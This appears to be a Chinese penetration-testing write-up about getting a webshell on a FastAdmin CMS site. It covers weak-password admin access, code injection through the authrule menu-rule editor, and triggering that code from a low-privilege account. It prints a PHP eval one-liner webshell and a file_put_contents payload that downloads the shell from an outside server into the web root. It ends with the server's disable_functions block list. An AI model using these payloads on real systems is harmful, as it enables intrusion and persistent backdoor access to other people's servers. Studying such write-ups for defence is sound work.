概述

某天，收到一个渗透测试任务，直接给了一个弱口令后台，说去拿另一个后台，但另一个后台没弱口令。只能先看一下，有弱口令的后台。

查看源代码，是fastadmin cms。

获取webshell过程

1、通过弱口令登录到fastadmin的后台，此处的利用方式是FastAdmin 后台 authrule 权限认证getshell，fastadmin对超管开放修改authrule表的权限，造成权限认证时，能触发代码执行。

在左侧菜单里，找到权限管理-菜单规则，编辑菜单规则。先写一个phpinfo()函数。如下：

2、注册一个低权限账户，然后用低权限账户进行登录，这里是自己在后台添加一个低权限账户，选择二级管理员组。

3、添加一个admin1的账号。

4、退出超级管理员账号，通过admin1的账号进行登录，登录后，触发代码执行。可以看到phpinfo的界面，找到绝对路径，后期方便写入马。

5、写入小马

利用fileputcontents和filegetcontents两个函数将木马写入。

准备一个小马。

<?php  eval($_POST["ant"]);?>

将小马放到自己的公网vps服务器，或者github网站上都可以，只要是公网即可。

以超级管理员的身份登录fastadmin的后台，同样的在编辑菜单规则处添加恶意代码。

file_put_contents('/www/wwwroot/xxx.com/public/a.php',file_get_contents('http://200.1.1.200:9090/b.php'))

7、退出超级管理员账号登录，以之前注册的低权限账户登录，登录后代码执行成功，直接用蚁剑进行连接即可。

8、拿到shell后查看是否可以执行命令，无法执行。服务器开启了disable_functions功能，禁用了可执行函数，策略比较严格。

passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

看到上面禁用的函数，心一阵拔凉。